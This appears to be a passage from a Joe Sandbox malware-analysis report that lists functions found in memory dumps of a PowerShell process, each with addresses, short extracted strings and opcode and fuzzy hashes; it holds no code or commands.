                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3c072b47c6415e336bd25511f5dfcc6a33f0d2fbc796b7be3b0186d1d616f0df
                                      • Instruction ID: 0547f65837aa47e101030922c52dc544f7b95cede33e73d7da2565036cb8d17a
                                      • Opcode Fuzzy Hash: 3c072b47c6415e336bd25511f5dfcc6a33f0d2fbc796b7be3b0186d1d616f0df
                                      • Instruction Fuzzy Hash: 6EB10870E002098FDF14CFA9D8897ADBBF2BB88314F14812DD815E7694EB789945CF85
                                      Function 02C9F8C8 Relevance: .3, Instructions: 266COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e9810c692b88e21c7e35768df9be1d773561f97631634acfd77d4e50293110a2
                                      • Instruction ID: 6780f2cb1692559f8fb99fef6600e8f8ea9b52d21b11b5cdba26b71ce664aa53
                                      • Opcode Fuzzy Hash: e9810c692b88e21c7e35768df9be1d773561f97631634acfd77d4e50293110a2
                                      • Instruction Fuzzy Hash: 9AB16E70E00209DFDF14CFA9D89979DBBF2AF88314F14812DE815EB694EB749945CB81
                                      Function 07204200 Relevance: 18.4, Strings: 14, Instructions: 922COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
                                      • API String ID: 0-3794447617
                                      • Opcode ID: 53add0bcdb432ccccbfb2620f89a6430620d143c20a9981e9cc592c8be755962
                                      • Instruction ID: abf4c7b8626e29a5e58ab5d0a5264a84d9d0a398bdbb40dbeec2cabec93e3a10
                                      • Opcode Fuzzy Hash: 53add0bcdb432ccccbfb2620f89a6430620d143c20a9981e9cc592c8be755962
                                      • Instruction Fuzzy Hash: 5982ADB4B202459FEB14DB98C544B9EB7B2EF85304F24C059E905AF396CB72ED42CB91
                                      Function 07206E98 Relevance: 18.1, Strings: 14, Instructions: 617COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$$q$$q$$q$$q
                                      • API String ID: 0-1107985924
                                      • Opcode ID: d1b1ac3488d4a0c2ff550177b8ddb80d712768bb0d17f1a8fe9b80ad4dd8a7ac
                                      • Instruction ID: 3d705e4de318d99761919686614de8747178ed1500fb11c636690ade6fff99cf
                                      • Opcode Fuzzy Hash: d1b1ac3488d4a0c2ff550177b8ddb80d712768bb0d17f1a8fe9b80ad4dd8a7ac
                                      • Instruction Fuzzy Hash: 34120EB1B142079FDF248B79991476ABBB2EF85210F14C06AD4468B3D2DB71D941CBF1
                                      Function 072041F5 Relevance: 9.5, Strings: 7, Instructions: 721COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q
                                      • API String ID: 0-3874413649
                                      • Opcode ID: 6565977b5392ad57916abf147a0827f12fc701be158ed99ecace7884be691c45
                                      • Instruction ID: 0b14aa13cd710882609cb90e905aa5de38ac7789259000a2fa02c4eaa3e2fd99
                                      • Opcode Fuzzy Hash: 6565977b5392ad57916abf147a0827f12fc701be158ed99ecace7884be691c45
                                      • Instruction Fuzzy Hash: 07627DB4A102459FEB04DB94C544B9AB7B2EF85704F24C099EA056F3E6CB72ED42CF91
                                      Function 07200778 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q$$q$$q$$q
                                      • API String ID: 0-170447905
                                      • Opcode ID: a7ce0ca0051df2a66b2f2be15793a45ad5a6928afdf7dfc030f3495bb3c51177
                                      • Instruction ID: b144e24eb6f02ddc8aa763e8ef9a55c799b8a601b5dc571db9b0111246470fc0
                                      • Opcode Fuzzy Hash: a7ce0ca0051df2a66b2f2be15793a45ad5a6928afdf7dfc030f3495bb3c51177
                                      • Instruction Fuzzy Hash: 3F7119B1B202168FEB349B7988007BAB7B2EF85610F14807BD549DB292DB71D951CBF1
                                      Function 07205068 Relevance: 5.4, Strings: 4, Instructions: 373COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q$4'q$4'q
                                      • API String ID: 0-4210068417
                                      • Opcode ID: 8a5b121fead7d207621e3fe938a11241c97ef10709034c8c713c5535aaf89e71
                                      • Instruction ID: 90b2c67753422b7ee313d42f70fe6e6fb7647030fe4bbcf46c1ce07d22f3813f
                                      • Opcode Fuzzy Hash: 8a5b121fead7d207621e3fe938a11241c97ef10709034c8c713c5535aaf89e71
                                      • Instruction Fuzzy Hash: 61E18FB4A102059FEB14DB65C554BAEB7B3AF89304F248069E4056F396CB72ED428FA1
                                      Function 0720C869 Relevance: 4.8, Strings: 3, Instructions: 1096COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q$4'q
                                      • API String ID: 0-3126650252
                                      • Opcode ID: 6334bb48948f09141450503e3a217e65d8dffd36169547945e9f9e270b6200fe
                                      • Instruction ID: 2f8cb6dadbb12d43cd65cf874f79de9c8f433086b35c997d350e1a8b3487cdaf
                                      • Opcode Fuzzy Hash: 6334bb48948f09141450503e3a217e65d8dffd36169547945e9f9e270b6200fe
                                      • Instruction Fuzzy Hash: BAB29EB5A103159FD724DB64C950BEEB7B2EF89304F5081A9D4096F391CB36AD81CFA1
                                      Function 0720329B Relevance: 3.2, Strings: 2, Instructions: 664COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q
                                      • API String ID: 0-1467158625
                                      • Opcode ID: 5e1ae60c22d31170826b315f69e46140011a5c304dba4c24f8d32f6bff95891a
                                      • Instruction ID: b35681bb542e5c117d3946df3367f1352aa25a0471942b1ebc816decd6e75e92
                                      • Opcode Fuzzy Hash: 5e1ae60c22d31170826b315f69e46140011a5c304dba4c24f8d32f6bff95891a
                                      • Instruction Fuzzy Hash: 335283B5A103159FE724DB54C950BAFB7B2AF85304F5080AED50A6B792CB31ED81CFA1
                                      Function 02C9B508 Relevance: 3.0, Strings: 2, Instructions: 524COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $q$$q
                                      • API String ID: 0-3126353813
                                      • Opcode ID: 18f6429539f78524197b8c71ce43f5509f80d16951006a53bd04a9b1adb872cb
                                      • Instruction ID: e98ba3d0b473c7ca9f0c7092ee1a246fac1691704836d9fdce23d33e708e4f69
                                      • Opcode Fuzzy Hash: 18f6429539f78524197b8c71ce43f5509f80d16951006a53bd04a9b1adb872cb
                                      • Instruction Fuzzy Hash: 90225C30B042189FDF25DB24D9587AEB7B2AF89304F1480A9D40AAB391DF35DE85CF91
                                      Function 07201040 Relevance: 3.0, Strings: 2, Instructions: 494COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: tPq$tPq
                                      • API String ID: 0-4270251778
                                      • Opcode ID: 471367a62a23fdfdab98fca5b9e1ba8156ae4171a33fac9c1b73eb0a6af70117
                                      • Instruction ID: 0fc7bb5fdb6ad101768b0579d96b25029652889a819c580aa103f8d5e7caeeeb
                                      • Opcode Fuzzy Hash: 471367a62a23fdfdab98fca5b9e1ba8156ae4171a33fac9c1b73eb0a6af70117
                                      • Instruction Fuzzy Hash: CE125FB4B10209DFEB14CB58C544B6EB7B2EF85314F14806AE9159F396CB72ED41CBA2
                                      Function 07205048 Relevance: 2.8, Strings: 2, Instructions: 304COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q
                                      • API String ID: 0-1467158625
                                      • Opcode ID: d87cc4eb1728bd0aa9a5d70a3518e95d584907185cc90b9d40ac1719608f54fd
                                      • Instruction ID: 14b49f709622fe3a535ba39cb965950f10fc6add505cb8eda392fe08a755b50b
                                      • Opcode Fuzzy Hash: d87cc4eb1728bd0aa9a5d70a3518e95d584907185cc90b9d40ac1719608f54fd
                                      • Instruction Fuzzy Hash: 4AC17DB4A102069FDB14CB65C550FAEBBB2AF89304F19C066E4056F396CB72ED41CFA1
                                      Function 07205031 Relevance: 2.8, Strings: 2, Instructions: 281COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q
                                      • API String ID: 0-1467158625
                                      • Opcode ID: e6c083edbacaeed65c9449f3bcf73cd6680dbd3573463c8bc00ab72693a4ac29
                                      • Instruction ID: 80f4900c7bdf2b25010db5a61c88b3c0bbba80ad9ccea22ea0249be4d41b3a95
                                      • Opcode Fuzzy Hash: e6c083edbacaeed65c9449f3bcf73cd6680dbd3573463c8bc00ab72693a4ac29
                                      • Instruction Fuzzy Hash: ADB17EB4A102069FDB14CB65C550FAEBBB2AF89304F298455E4056F3D6CB72ED41CFA1
                                      Function 07200A80 Relevance: 2.7, Strings: 2, Instructions: 170COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: tPq$tPq
                                      • API String ID: 0-4270251778
                                      • Opcode ID: d36ee8265202842267c001338cd7db9236644f40997b0b39cd661eb0734ef4fd
                                      • Instruction ID: 3502a3e3dd848eb1d0cfe170fb1d9ea14d399014fdd8ace24403df130c00a6f6
                                      • Opcode Fuzzy Hash: d36ee8265202842267c001338cd7db9236644f40997b0b39cd661eb0734ef4fd
                                      • Instruction Fuzzy Hash: 48514B717243069FFB344AA99900B7ABBA29FC2215F18807BD149DF2D2CA71C845C3F1
                                      Function 07203CD8 Relevance: 2.1, Strings: 1, Instructions: 804COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: 55ab946d91bcd02f327855733d2ff3d1ae5f0640e5358dcdc2490c62c4c54780
                                      • Instruction ID: 72de9eca378bfd507549d5ace181bef208e2609dd5d353cea576df7397f5b0d1
                                      • Opcode Fuzzy Hash: 55ab946d91bcd02f327855733d2ff3d1ae5f0640e5358dcdc2490c62c4c54780
                                      • Instruction Fuzzy Hash: BA7281B4A10315DFE724DB54C950B6AB7B2AF89304F5081AED54E6B782CB31AD81CFA1
                                      Function 07203E90 Relevance: 1.8, Strings: 1, Instructions: 562COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: 7c0fbc509af6042e82d8cca1eb8c763f2ef7f2ce468d6ed7c9032a4fb0a2037c
                                      • Instruction ID: 9e7616e1e81270f0dd39e097b38df6ce52c620aabf0db1033126a3148a2cd6cf
                                      • Opcode Fuzzy Hash: 7c0fbc509af6042e82d8cca1eb8c763f2ef7f2ce468d6ed7c9032a4fb0a2037c
                                      • Instruction Fuzzy Hash: 5D3291B4A10315DFE724DB54C950BABB7B2AF89304F5081ADD50E6B792CB31AD81CFA1
                                      Function 0720CA33 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: 46023e6def27a3f884928a83c6b9df8e3ec3c89afc14afd93131c50c1dfd8802
                                      • Instruction ID: 55866347d6d7ef990693da12a70308bd3e94f170024bf5731c2c99df78e56d8d
                                      • Opcode Fuzzy Hash: 46023e6def27a3f884928a83c6b9df8e3ec3c89afc14afd93131c50c1dfd8802
                                      • Instruction Fuzzy Hash: 9632A0B5A103159FD724DB54C950BEEB7B2EB89304F5081A9D40A6F391CB36ED82CFA1
                                      Function 0720CCC8 Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: 064defbe2a764914abb0d8fc9b27aa542305c8310aeff67f2fa3cfc3fc196124
                                      • Instruction ID: ebb17f64398c5482768dabb3427b2d251a9efc309c0e267e6f1a97a0c11d7826
                                      • Opcode Fuzzy Hash: 064defbe2a764914abb0d8fc9b27aa542305c8310aeff67f2fa3cfc3fc196124
                                      • Instruction Fuzzy Hash: B9122FB4A25316DFEB60CB54C950BAEB7B2EB45304F1080D9D509AB392CB71ED81CFA1
                                      Function 0720CABC Relevance: 1.7, Strings: 1, Instructions: 434COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: 6de59c27e185b3eb548ee3c5f97039017f42f3ca9256ead2b4e4535156ff41d4
                                      • Instruction ID: e197f430e16f5db4cb12bb8e58ea1d9d2e5185b2c1e018d8a5f459f285b203a3
                                      • Opcode Fuzzy Hash: 6de59c27e185b3eb548ee3c5f97039017f42f3ca9256ead2b4e4535156ff41d4
                                      • Instruction Fuzzy Hash: D3121EB4A21216DFEB60CB54C954BAEB7B2EB45304F5080D9D509AB392CB71ED81CFA1
                                      Function 080015E0 Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: "
                                      • API String ID: 0-123907689
                                      • Opcode ID: b2616fed36ddb5b681f1b771b9d633944de94e51761905d40ff3577d69a4c382
                                      • Instruction ID: 1f94fecbef4d5a7a8f67c38a2bf8426206c1237c5efca6b85e250bff089ff82b
                                      • Opcode Fuzzy Hash: b2616fed36ddb5b681f1b771b9d633944de94e51761905d40ff3577d69a4c382
                                      • Instruction Fuzzy Hash: 73819134A01204DFDB15DBA8C5849ADBBF2FF89315F1884A9E405AB362C735ED4ACF50
                                      Function 080007A0 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: PHq
                                      • API String ID: 0-3820536768
                                      • Opcode ID: a202d6fbc7c9ff3cc4ea61a7cea0900c4dea1e8669fb5bff217fbc2e9eccd2d8
                                      • Instruction ID: b47b7521a75b252a13bcd2d1b5ac7d73ab03cfd6f458ec6bf93382c925640863
                                      • Opcode Fuzzy Hash: a202d6fbc7c9ff3cc4ea61a7cea0900c4dea1e8669fb5bff217fbc2e9eccd2d8
                                      • Instruction Fuzzy Hash: C5718C30E00649CFEB54DBE8C954BADBBB2AF85305F20452AD406AF394EB75AD45CB41
                                      Function 08000791 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: PHq
                                      • API String ID: 0-3820536768
                                      • Opcode ID: 9ab88f33ba708f3e0b094169d7269f0ae469873ab746a680d1bad70f5b370537
                                      • Instruction ID: a14021fee6e4279fc625e5059c1639854935b461455f583b8c95bca221c3a50f
                                      • Opcode Fuzzy Hash: 9ab88f33ba708f3e0b094169d7269f0ae469873ab746a680d1bad70f5b370537
                                      • Instruction Fuzzy Hash: F3518870E006498FEB15DBA8C9547AEBBB2BF85300F24452AE406AF390EB74AD45CF41
                                      Function 08000D78 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8:t
                                      • API String ID: 0-154741950
                                      • Opcode ID: 9d1ab786d8d8be134ef8398010fa5490c9b80394517db35d00e8e436934bd40f
                                      • Instruction ID: 18629469dcc1ba56540855f60458d2d71a49a127b2d517c9af33fc3ca494cf7a
                                      • Opcode Fuzzy Hash: 9d1ab786d8d8be134ef8398010fa5490c9b80394517db35d00e8e436934bd40f
                                      • Instruction Fuzzy Hash: 45F08130204B099BD7699B2DD04957EB7B7FF85615354442EE0068BB80CF75F812CF91
                                      Function 080047E8 Relevance: .4, Instructions: 435COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a43a8b4c62109d08d30b032bfc5b8f2bab6edf1b46e99737f4c659808b661ca4
                                      • Instruction ID: 0808084e5171726a940738fbbfda5a04d673c344766b7468b08fcfc2ceb6d8d7
                                      • Opcode Fuzzy Hash: a43a8b4c62109d08d30b032bfc5b8f2bab6edf1b46e99737f4c659808b661ca4
                                      • Instruction Fuzzy Hash: A2022574A006099FDB55CF98C584AADBBF2FF48314F288159E905AB395C731ED82CF98
                                      Function 080067E0 Relevance: .4, Instructions: 426COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 30c71ac93bcf367a1cb7777e50682e8a0429e53084f8e8c8a38b1abde4be14ee
                                      • Instruction ID: 71c35dcadb1135b45507bb3bf68c262e900c68d02e1ce8d7f6b305041523088a
                                      • Opcode Fuzzy Hash: 30c71ac93bcf367a1cb7777e50682e8a0429e53084f8e8c8a38b1abde4be14ee
                                      • Instruction Fuzzy Hash: B2020774A002099FDB55CF98D984AADBBB3FF49310F248159E815AB3A5C735EC92CF90
                                      Function 08005E82 Relevance: .4, Instructions: 369COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f540ba83b94e7af1ae9e821e5d398711b75c9c4bd549654fc3610ab404b6d14
                                      • Instruction ID: 555f08540fcd7f4514897bb29f0d2f928cc513746e615ac2c351a41020435c8f
                                      • Opcode Fuzzy Hash: 5f540ba83b94e7af1ae9e821e5d398711b75c9c4bd549654fc3610ab404b6d14
                                      • Instruction Fuzzy Hash: 0FF11A34A012499FEB15CF98C884A9EBBB3FF49311F248159E815AB395C735DC92CF90
                                      Function 02C9A9E0 Relevance: .4, Instructions: 356COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0597de28c9124667df6f4cd932f59f7033c57e7e94c45283ca4994721d5d2b2a
                                      • Instruction ID: 738473225f4c93a211d80af959d09cfcbf1c22f9aa08cb3b2d74924e792df444
                                      • Opcode Fuzzy Hash: 0597de28c9124667df6f4cd932f59f7033c57e7e94c45283ca4994721d5d2b2a
                                      • Instruction Fuzzy Hash: 80E11975A002599FDF15CF98D594AADFBB2FF88314F288159E805AB351C731ED82CB90
                                      Function 02C995A8 Relevance: .3, Instructions: 328COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ee1e11a4f270e387a6bec9a52ea3c349e969422c6fc9b39755c2c575b3a84299
                                      • Instruction ID: 83e26a03e4b878a8cc2c6c4b7334025bed010f0a1bd9999332bf1ef90c1344bd
                                      • Opcode Fuzzy Hash: ee1e11a4f270e387a6bec9a52ea3c349e969422c6fc9b39755c2c575b3a84299
                                      • Instruction Fuzzy Hash: 8AD15B34E012499FDF15CFA8D584A9DFBB2EF89310F29815AE805AB361C731ED46CB91
                                      Function 02C972A0 Relevance: .3, Instructions: 313COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3424ef73765dd313a2f3be7fcf9b9a126df6dd434b88d59c2be5de59962c4749
                                      • Instruction ID: c40b5a39f15b9da704eda00a9388bd35e6917d8f2864e9b2688b03aefb03ce13
                                      • Opcode Fuzzy Hash: 3424ef73765dd313a2f3be7fcf9b9a126df6dd434b88d59c2be5de59962c4749
                                      • Instruction Fuzzy Hash: 47C19A75A11208CFCF15DFA4C948AADBBB2FF84314F158569E406AB364DB35EE49CB80
                                      Function 02C9EFED Relevance: .3, Instructions: 279COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 176374cd37ba44f9a612f26ddbdfe68f43692e39955636536ee9cf501704f61f
                                      • Instruction ID: 819e6c529167905f5ea881138e30bd0cf875d1034200168086782196df8455be
                                      • Opcode Fuzzy Hash: 176374cd37ba44f9a612f26ddbdfe68f43692e39955636536ee9cf501704f61f
                                      • Instruction Fuzzy Hash: 6CB12770E00209CFDF10CFA9D88979DBBF1BB88314F248129E819E7694EB789945CF91
                                      Function 02C9F8BC Relevance: .3, Instructions: 263COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c088365c6ccc1566f1f8e82340b4f25d42286162b1d4b0e7d1696507d29e7644
                                      • Instruction ID: 955485414d445ac0087000de432e7707ebeaa1f86a34e164b2ce93d112064996
                                      • Opcode Fuzzy Hash: c088365c6ccc1566f1f8e82340b4f25d42286162b1d4b0e7d1696507d29e7644
                                      • Instruction Fuzzy Hash: 3EB13A70E002099FDF10CFA9D89979DBBF2AF88314F24812DE815E7694EB749985CB91
                                      Function 07205E10 Relevance: .2, Instructions: 241COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0c00133fa6a5efd90f3d666e24196ec7dde87d5e6bf1cf67cf5ad5e3789c9aa8
                                      • Instruction ID: f2c39a63f4e926471c42a8aa3bcfe1aead6c3af7f7a1ccfdff458b2c612419d8
